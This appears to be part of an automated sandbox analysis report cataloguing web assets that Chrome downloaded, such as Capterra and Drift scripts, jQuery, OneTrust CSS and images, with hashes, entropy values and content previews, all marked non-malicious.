                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6145), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6145
                                                                                                                                                                                                        Entropy (8bit):5.4151225877817915
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Dp6cF7ZZ7IRn+DVk3+kk21uulfaN9kV41w6C+:96k7fIRn+DVk3vk2oulfabkg2+
                                                                                                                                                                                                        MD5:6D74156C5B845474542B02E11A246297
                                                                                                                                                                                                        SHA1:B50FAE1CDE99F95D3F67ED1DC52C07C03302684C
                                                                                                                                                                                                        SHA-256:CB33A5B504120FFB0A2B976F60F1A21EE07078D1D35097EA768515AECC2DC7FE
                                                                                                                                                                                                        SHA-512:F2621CD9A37E0D515FCD31F325B49BBF653E88F993EAB5F0A7621F7820B86EF64F10EA413E2E6918DEAD6121F987EDDD67BCBB161DB029D880434297309D4B07
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/runtime~main.72ecb88a.js
                                                                                                                                                                                                        Preview:!function(e){function webpackJsonpCallback(c){for(var r,d,t=c[0],n=c[1],_=c[2],u=0,i=[];u<t.length;u++)d=t[u],a[d]&&i.push(a[d][0]),a[d]=0;for(r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r]);for(o&&o(c);i.length;)i.shift()();return f.push.apply(f,_||[]),checkDeferredModules()}function checkDeferredModules(){for(var e,c=0;c<f.length;c++){for(var r=f[c],d=!0,t=1;t<r.length;t++){var n=r[t];0!==a[n]&&(d=!1)}d&&(f.splice(c--,1),e=__webpack_require__(__webpack_require__.s=r[0]))}return e}var c={},r={6:0},a={6:0},f=[];function __webpack_require__(r){if(c[r])return c[r].exports;var a=c[r]={i:r,l:!1,exports:{}};return e[r].call(a.exports,a,a.exports,__webpack_require__),a.l=!0,a.exports}__webpack_require__.e=function requireEnsure(e){var c=[];r[e]?c.push(r[e]):0!==r[e]&&{1:1,3:1,4:1,8:1,16:1,23:1,25:1,27:1,28:1,30:1,31:1,33:1,35:1,36:1,38:1,39:1,44:1,45:1,46:1,47:1,48:1}[e]&&c.push(r[e]=new Promise(function(c,a){for(var f="assets/css/"+({}[e]||e)+"."+{0:"31d6cfe0",1:"fdc718c4",2:"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9010), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):9010
                                                                                                                                                                                                        Entropy (8bit):5.371041651908105
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:kEhqeW5Yf52s1NFbXJPJtygqoXgHMze0/R:HU5Yf52QCeXZ
                                                                                                                                                                                                        MD5:C7645BF57FB6AEBDD44E1C85C163129F
                                                                                                                                                                                                        SHA1:1B9C0087A12D9BFC206E73154727C3225DA9EF29
                                                                                                                                                                                                        SHA-256:5D462F95ADB0CA30CAFD288B4C5B80C32CC02C6C6228BE8E921B6B251421D566
                                                                                                                                                                                                        SHA-512:DED182D21ACE14DA191B9A4E6F58AD1C01445C0B068DD3E5FDB9562FEB82F474A5AA4C58106BF08B1299AEEE4B1B014DFFD6E7CB2C16A5B7CF3AD25EA4F0BA41
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/511-9bb02dae23defc15.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[511],{76125:function(e,t,n){var s=n(27573),a=n(17033),l=n(40763),r=n(69379),i=n(78713),o=n(43930);let d=e=>{let{children:t}=e;return(0,s.jsx)("p",{className:"text-neutral-99 text-lg font-semibold md:text-xl",children:t})};t.default=e=>{var t,n,u,c;let{pros:v,cons:x,showReviewButtons:m}=e,p=(0,l.useSharedData)(),f=null!==(n=null==p?void 0:null===(t=p.reviewSummary)||void 0===t?void 0:t.totalReviews)&&void 0!==n?n:0,h=null!==(u=null==p?void 0:p.reviewUrl)&&void 0!==u?u:"",g=(0,i.f_)({product:{id:null!==(c=null==p?void 0:p.productId)&&void 0!==c?c:"",reviewSummary:null==p?void 0:p.reviewSummary,slug:null==p?void 0:p.slug,publishedPages:null==p?void 0:p.publishedPages},facet:"reviews"}),j=v.length>x.length?x.length:v.length;return(0,s.jsxs)("div",{"data-testid":"desktop-pros-and-cons",className:"px-2xs my-2xl border-t-1 border-b-1 border-primary-50 gap-xl flex",children:[(0,s.jsxs)("div",{className:"py-xl flex basis-1/2
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 246 x 76, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):15225
                                                                                                                                                                                                        Entropy (8bit):7.975572338574448
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:jq7aFX2Cj9FdG+rlA2TzRl6CghpyAKiPb4svSDPk2DqTVW2T:jqcGCj9FdHlTza7pyAKiBvAMgqpW2T
                                                                                                                                                                                                        MD5:F99E405A345A0531CE5968469FF42BAE
                                                                                                                                                                                                        SHA1:4BCD8E717CFDF479145464B175BCFC998B7F6D9D
                                                                                                                                                                                                        SHA-256:340131FBAA5A1121951FD4587C0C2E01756F2B002F8232CB8ED4445CC32A8C6B
                                                                                                                                                                                                        SHA-512:6556F560516E1866A6BBA59D78A3FC3862B0E2FACE79F3FC752CA19FABBC3DBF57C372821D7FE12EA132D419A2AF4875293378BD24A6DE66779A96835FDDC2C5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/2000px-Pepsi_logo_new.svg.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.......L.....^CJ.....gAMA......a....8eXIfMM.*.......i.......................................L.....#Z...:.IDATx..].`U....o.D..@.!@...p@P..* j.jQ.Z.j[k...........V..."b.+)..P...N.<....!!...._..!...H...y..{...{......Na.,K.vr...9.t&...H..P2(...I /..t.t.T...m.m.....).0..MQ.|.9.@;...v.&....@.....m'."..V.........}P=....h.r.k.vQ...........}.t...q(Y>.....Y...n...DV..H.!.EBq..s.p.....H8.OU%.P[......Z...T.....(..V..u`..=.\...-. V..V..m ......d..G...d...y.......P.HjB.......4h.....9...$O.GrZ*..8.......p.A.AO.^....M...(.....5`.....%.....8.*..U..e.........y....)-.$dL.%T...To....&.E..;.^N.D..)..F.yg.4h II... 3..=.Z.:...*.MQ.|.9.+.....%........YdVT.....^z...yd...K....._..y{....5...A.Dr....\J..3H......qm.>..z........W..=.6@.shV.YJ...]I:...7.6...j..P..^.s[O....;.R/...7.&.R\N.......G@... [.._5.t...4,W.u.~|.....F.?.NM..o..dU...0|.l@....[.u......^@.o.@...$CMGb.........y.,....Jq.[...y.......6.....z.._m..nX.O5.[>..8Tt6.9n..\..!u"V...y5./.....@..(..2..2....h.}.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1796
                                                                                                                                                                                                        Entropy (8bit):4.045166220882716
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:tIPGMt1MxWbf6x4Tibf6x4Libf6x4nibf6x4/ibf6x4l:MGiEsQEkQEUQEOQEW
                                                                                                                                                                                                        MD5:7E651C149AA43F8201B4C4CBA338515F
                                                                                                                                                                                                        SHA1:E24E5B1BFC857362D31ED1DA1DC13B818A984D4F
                                                                                                                                                                                                        SHA-256:F055243F64EC0A2DB0B8C949B65863B5870EF1C932D7F9823F1CCB78D0D434D5
                                                                                                                                                                                                        SHA-512:6874C6EC6D0914A2C312EAC52CDF8F428156C50677D760039CA6300C855BFCE6E4B0476671664D62B99A7199FD83B8F171CC11D5FF8CAE5CB178B06722982032
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<svg width="143" height="28" viewBox="0 0 143 28" xmlns="http://www.w3.org/2000/svg">. <g fill="#FFB931" fill-rule="evenodd">. <path d="m13.535 21.245-5.97 3.138a1 1 0 0 1-1.451-1.054l1.14-6.648a1 1 0 0 0-.288-.885l-4.83-4.708a1 1 0 0 1 .554-1.706l6.675-.97a1 1 0 0 0 .753-.547l2.985-6.048a1 1 0 0 1 1.794 0l2.985 6.048a1 1 0 0 0 .753.547l6.675.97a1 1 0 0 1 .554 1.706l-4.83 4.708a1 1 0 0 0-.288.885l1.14 6.648a1 1 0 0 1-1.45 1.054l-5.97-3.138a1 1 0 0 0-.931 0zM42.235 21.245l-5.97 3.138a1 1 0 0 1-1.451-1.054l1.14-6.648a1 1 0 0 0-.288-.885l-4.83-4.708a1 1 0 0 1 .554-1.706l6.675-.97a1 1 0 0 0 .753-.547l2.985-6.048a1 1 0 0 1 1.794 0l2.985 6.048a1 1 0 0 0 .753.547l6.675.97a1 1 0 0 1 .554 1.706l-4.83 4.708a1 1 0 0 0-.288.885l1.14 6.648a1 1 0 0 1-1.45 1.054l-5.97-3.138a1 1 0 0 0-.931 0zM70.935 21.245l-5.97 3.138a1 1 0 0 1-1.451-1.054l1.14-6.648a1 1 0 0 0-.288-.885l-4.83-4.708a1 1 0 0 1 .554-1.706l6.675-.97a1 1 0 0 0 .753-.547l2.985-6.048a1 1 0 0 1 1.794 0l2.985 6.048a1 1 0 0 0 .753.547
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (24823), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):24823
                                                                                                                                                                                                        Entropy (8bit):4.792811205299742
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:+Z8C4hGoFpHwAuLlCS7FGAVsq1nwGfg4xqsQMPNE:JlMuJ
                                                                                                                                                                                                        MD5:E04AD89975C535B30BAE773D0EB0D3B2
                                                                                                                                                                                                        SHA1:0C72555D0FD844150B6EC407A57DA2D29BF380E2
                                                                                                                                                                                                        SHA-256:06C0EDBFC1B871FB45195265F5FAAD3E23191305F6FF2125557A9FBC287C8992
                                                                                                                                                                                                        SHA-512:6044553C64225C3F3F2AA5EF866BF55B1148CD5B7FE1A668417BF9BC24B70BB7C10048049C2201D986A28CFF85B1A93CE673CBF687FA4B8BE2DAEB5B8C6B73D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://cdn.cookielaw.org/scripttemplates/202403.2.0/assets/otCommonStyles.css
                                                                                                                                                                                                        Preview:#onetrust-banner-sdk{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}#onetrust-banner-sdk .onetrust-vendors-list-handler{cursor:pointer;color:#1f96db;font-size:inherit;font-weight:bold;text-decoration:none;margin-left:5px}#onetrust-banner-sdk .onetrust-vendors-list-handler:hover{color:#1f96db}#onetrust-banner-sdk:focus{outline:2px solid #000;outline-offset:-2px}#onetrust-banner-sdk a:focus{outline:2px solid #000}#onetrust-banner-sdk #onetrust-accept-btn-handler,#onetrust-banner-sdk #onetrust-reject-all-handler,#onetrust-banner-sdk #onetrust-pc-btn-handler{outline-offset:1px}#onetrust-banner-sdk.ot-bnr-w-logo .ot-bnr-logo{height:64px;width:64px}#onetrust-banner-sdk .ot-tcf2-vendor-count.ot-text-bold{font-weight:bold}#onetrust-banner-sdk .ot-close-icon,#onetrust-pc-sdk .ot-close-icon,#ot-sync-ntfy .ot-close-icon{background-size:contain;background-repeat:no-repeat;background-position:center;height:12px;width:12px}#onetrust-banner-sdk .powered-by-logo,#onetrust-banner-sdk .ot-pc-fo
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, baseline, precision 8, 500x424, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):22921
                                                                                                                                                                                                        Entropy (8bit):7.960310644437045
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:f0/m3M5mhHIdokBwpaGo3DezvO9mcuLHrbn5MsUS5AW42MZqgzFGASY+mW:j35QvanoTezvO9TuLHrbn5MIZgJGCW
                                                                                                                                                                                                        MD5:0291C2C370D004FB832249D13F69B83E
                                                                                                                                                                                                        SHA1:1F0BEB059EF33B6376CE73B440C7ED7A80EB9793
                                                                                                                                                                                                        SHA-256:497D6038B37D964D27683ED7329AB057DC8823BDA55BAA5F6D6329C5F3F59717
                                                                                                                                                                                                        SHA-512:6E026B1478370A15D53DC6146BABCC6C50600A6D48A4E7B24266E09182D0DC346073D86084784CB6473720F463C4B04F9E692097A83FB4E847DF7A98B39FE6F6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/nhph1-p-500.jpg
                                                                                                                                                                                                        Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................W...........................!1..23AQUq..."Rar......STb...#45Bct....Vd...%6s..$&D.Ee...................................<...........................!1R..AQ.Saq."24....b...$3BT.#r.............?...G.69.pk@.'`\.*.K.L.l...4..H...Q....P..G.R......:.y..\.{z?G.q.....Ii)B[*O....VW../.....F...Vw...gh....B.....x.....}.c}-Y.&.......!z.7.#c..|.6kZ.I....K.+....}..67...o...j..G..q<>.-v.UO...$d.Z..4..f)>..x.JM~l....j..7...gh..}......hp.......#..F+2Iv..^O....$o...j..7...gh.R...tr....k..>PW.m.....U..'.}.c}-Y.&.......2..jfl4.>Y\l.1.......F#.......k..I...U]:)..V.Z.~d..c}-Y.&.......!..4.Wb.".S.........|..KVv........W..f_|..KVv..lo..;E.D...]....../.lo..;D.67...."li....U.}..67...o...j..b.64.Wa.*.>.....j..7...gh....}+...z.ve....gh....Z..X.M.>..x..O.2....Z..M.c}-Y.,B&.J.<E^..}.c}-Y.&.......!.cO
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17558)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):18318
                                                                                                                                                                                                        Entropy (8bit):5.526328799423595
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:sBpuqH/hjrTh73Cq/NsAihkU/Tdosoai4uoWXjXBUKRKji:sB3fZx3O1hkU/TjoaNuoWXT5Rx
                                                                                                                                                                                                        MD5:5622E358424CB080FEF281AA7045BA59
                                                                                                                                                                                                        SHA1:DEB0FFAE022297D8100E166A1FC19D0FA8B3D602
                                                                                                                                                                                                        SHA-256:E16F797F2A141D51C522F403E0B4848EC6497221902F28AA44DF4F59EC688E85
                                                                                                                                                                                                        SHA-512:1051B0961B68168F998D225D57E5D877866632173FB5642A2458A0BA75DA79BBCB93EE5972B6A68EF7F90DBE7DEF4BB922136F41ED53F07B9A98416B2F41DCC4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(()=>{var u=(e,t,n)=>new Promise((o,r)=>{var c=a=>{try{l(n.next(a))}catch(i){r(i)}},s=a=>{try{l(n.throw(a))}catch(i){r(i)}},l=a=>a.done?o(a.value):Promise.resolve(a.value).then(c,s);l((n=n.apply(e,t)).next())});window.__mmapiws=window.__mmapiws||{};var p=window.__mmapiws;function g(e,t){let n=e.length&3,o=e.length-n,r=t,c,s=3432918353,l=461845907,a=0,i;for(;a<o;)i=e.charCodeAt(a)&255|(e.charCodeAt(++a)&255)<<8|(e.charCodeAt(++a)&255)<<16|(e.charCodeAt(++a)&255)<<24,++a,i=(i&65535)*s+(((i>>>16)*s&65535)<<16)&4294967295,i=i<<15|i>>>17,i=(i&65535)*l+(((i>>>16)*l&65535)<<16)&4294967295,r^=i,r=r<<13|r>>>19,c=(r&65535)*5+(((r>>>16)*5&65535)<<16)&4294967295,r=(c&65535)+27492+(((c>>>16)+58964&65535)<<16);switch(i=0,n){case 3:i^=(e.charCodeAt(a+2)&255)<<16;case 2:i^=(e.charCodeAt(a+1)&255)<<8;case 1:i^=e.charCodeAt(a)&255,i=(i&65535)*s+(((i>>>16)*s&65535)<<16)&4294967295,i=i<<15|i>>>17,i=(i&65535)*l+(((i>>>16)*l&65535)<<16)&4294967295,r^=i}return r^=e.length,r^=r>>>16,r=(r&65535)*2246822507+(((
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65451)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):89476
                                                                                                                                                                                                        Entropy (8bit):5.2896589255084425
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                                                                                                        MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                                                                                                        SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                                                                                                        SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                                                                                                        SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=5e9170ba37cf8dfae03ae1a4
                                                                                                                                                                                                        Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3172), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3172
                                                                                                                                                                                                        Entropy (8bit):5.269660294088833
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:fb2mfU+PzbtxJFcX0aTgRyw/QtzbQ5dbMj2UC1T+mlxC9H7X9yRy:G+fJF5x/QXUhH0muVN
                                                                                                                                                                                                        MD5:51A8E5389A9E376C3FA55815E028B144
                                                                                                                                                                                                        SHA1:222C2A38F0B256500C543FFE764EAA8F19D4B457
                                                                                                                                                                                                        SHA-256:62C357E57C33404791BED8B627D5C08794BD6CF9036577E1E7C94CA65A43DB57
                                                                                                                                                                                                        SHA-512:4A134F7E8520CCAA8782E22149BF642E085979BDC1C7E3B469E15721864257F1BAB8338B045A6412D14F3CEDD12C81C3A4BC2184409A8575197B2E72AC81E40B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/8977.dc99403a46707026.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8977],{78977:function(r,s,e){"use strict";e.r(s),e.d(s,{default:function(){return C}});var x=e(52322),a=e(2784),c=e(40489),t=e(6495),l=e(78283),n=e(25632),d=e(13163),i=e(19357),m=e(26931),o=e(11228),j=e(13980),h=e.n(j);let p={"secondary-1":"#062F42","secondary-2":"#04344B","secondary-3":"#043A54"},u=r=>{let{className:s="",color:e,children:a}=r;return(0,x.jsx)("div",{className:"rx-p-lg rx-text-center rx-w-full md:rx-w-1/3 rx-flex rx-flex-col rx-justify-center rx-items-center ".concat(s),style:{background:p[e]},children:a})};u.propTypes={className:h().string,color:h().string,children:h().node};var N=e(13473),f=e.n(N),C=()=>{let{ssrProps:{hasIncentives:r}}=(0,i.bN)(),[s,e]=(0,a.useState)(!1);return(0,x.jsxs)(x.Fragment,{children:[(0,x.jsxs)("div",{className:(0,c.Z)("rx-w-full","rx-bg-primary-100",f()["capterra-hero--wrapper"]),"data-testid":"hero-component",children:[(0,x.jsx)(t.Z,{children:(0,x.jsxs)("div",{className:"md:rx-w-2/3 r
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6924
                                                                                                                                                                                                        Entropy (8bit):3.873351993615313
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:SkOOSeDAZ5vNdHfojVHvHAhIPspsNCttD2TSmBcp3QXol7Q8HRrpGC7k465uORpf:DDSeDAfVdHmHPsGlu5QATRrj6RwuVD
                                                                                                                                                                                                        MD5:359A1485C2C59C132514F9A460041A81
                                                                                                                                                                                                        SHA1:D85595590A33802D3F86A8F7CE7B006BB4DCF1CC
                                                                                                                                                                                                        SHA-256:FCCD35B61C6491305B208CB5C209D9D0E41E1A6B430A4C97E9E140F61060C544
                                                                                                                                                                                                        SHA-512:4C8C62A8845DB755954CCE9ECD8E8D30C172C7C9FE7EF6F01C1FBE07D65678D822EB6376F43639C69E7807046C18641DE21E6BADC681C0F81886681CB61E8419
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<svg width="122" height="27" viewBox="0 0 122 27" xmlns="http://www.w3.org/2000/svg">. <g fill="#FFF" fill-rule="nonzero">. <path d="m0 9.913 11.181.002 6.8.001V3.181z"/>. <path d="M17.98 3.18v23.781L26.472 0z"/>. <path d="M17.98 9.916h-6.799l6.8 17.045z"/>. <path d="m0 9.913 12.925 4.376-1.744-4.374zM41.19 20.701a3.133 3.133 0 0 1-.493.37c-.23.147-.53.295-.899.443-.37.148-.82.275-1.354.382a9.444 9.444 0 0 1-1.835.16c-1.33 0-2.48-.214-3.448-.64-.969-.427-1.77-1.023-2.401-1.786-.632-.764-1.096-1.666-1.392-2.71-.295-1.042-.443-2.187-.443-3.435 0-1.247.16-2.401.48-3.46.32-1.06.8-1.974 1.44-2.746a6.621 6.621 0 0 1 2.402-1.81c.96-.435 2.09-.653 3.387-.653.64 0 1.219.058 1.736.172.517.115.968.251 1.355.407.385.156.705.32.96.492.254.173.447.317.579.431.148.132.275.288.382.468.106.181.16.378.16.591 0 .329-.124.657-.37.986a7.12 7.12 0 0 1-.813.91 10.009 10.009 0 0 0-.665-.603 4.499 4.499 0 0 0-.825-.541 5.47 5.47 0 0 0-1.034-.394 4.853 4.853 0 0 0-1.293-.16c-.837
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                        Entropy (8bit):2.459147917027245
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                                        MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                                        SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                                        SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                                        SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.......,..........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10998), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10998
                                                                                                                                                                                                        Entropy (8bit):5.401854333655161
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:/FoldHrFouQhx82CYE8mAwVbH9HX93t5dhj1Vcf4YtWwubOKihHV:QdHKhx82CYETAwvHXJt5f1WfOwgC1
                                                                                                                                                                                                        MD5:90F2E1FBF02A398724707AF02DDB4AA4
                                                                                                                                                                                                        SHA1:21563855102F763E61E1AF34A0E979486F14E18E
                                                                                                                                                                                                        SHA-256:63A7E475C2662E75B59B27DECD46F85D06DE76BCA6250276822837DB0E5EE500
                                                                                                                                                                                                        SHA-512:0B0A25BAE0CE92F47B1D3A63A34ADEC4A71EFC1B6CC2C439C442B790D3652E3BD81040FF0C65816E5413DE016DB01C649F34C7BC0D410F44BF844960D8B74A17
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/6219-8aeebfe458a66b5a.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6219],{72845:function(t,e,n){var a=n(27573),r=n(14823),o=n(907);e.default=t=>{let{gtmContainerId:e}=t;return(0,o.p)(o.Q.DISABLE_GOOGLE_TAG_MANAGER)?null:(0,a.jsx)(r.cp,{gtm:{id:e}})}},53123:function(t,e,n){n.r(e),n.d(e,{GTMInitialDataLayer:function(){return d},default:function(){return s}});var a=n(27573),r=n(7653),o=n(26863),i=n(907),c=n(20455);n(71364);var l=(0,n(30359).$)("ed1db1d564ee43517e328ffe5c002579ebe29f7c");let d=t=>{let{data:e={}}=t;(0,r.useEffect)(()=>{l({data:e})},[]);let n=(0,r.useRef)(!1);return n.current||c.Z.google.send(e),(0,r.useEffect)(()=>{n.current=!0},[]),null};var s=t=>{let{gtmContainerId:e}=t;return(0,i.p)(i.Q.DISABLE_GOOGLE_TAG_MANAGER)?null:(0,a.jsx)(o.default,{strategy:"afterInteractive",id:"google-tag-manager",type:"text/javascript",dangerouslySetInnerHTML:{__html:"\n (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':\n new Date().getTime(),event:'gtm.js'});var
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 622130
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):196789
                                                                                                                                                                                                        Entropy (8bit):7.998419366214683
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:6144:QvhTrDYp/smsj8qSUZOiQKVQKkZ7DbOWW:QdrS03j8RWdlj
                                                                                                                                                                                                        MD5:F353205285D0BEF92A483210D7132936
                                                                                                                                                                                                        SHA1:714A1C55A86637FBAD85D5FB2A61C291353BBD40
                                                                                                                                                                                                        SHA-256:ED67A6A7832056BD9CE9F31A4A7A3FF816B65003B84329F0A7DF4E5749CFF086
                                                                                                                                                                                                        SHA-512:1C75D80B97A3ED1183E2E3A011311A5A17C6A4A05B25F4C2B9BA0335364AA4B484FCFB8F815C52F7ADD3B19E5C12758F2FE6F792CE5A96B34E01D80B16F5CE8D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.intercomcdn.com/vendor.e6414237.js
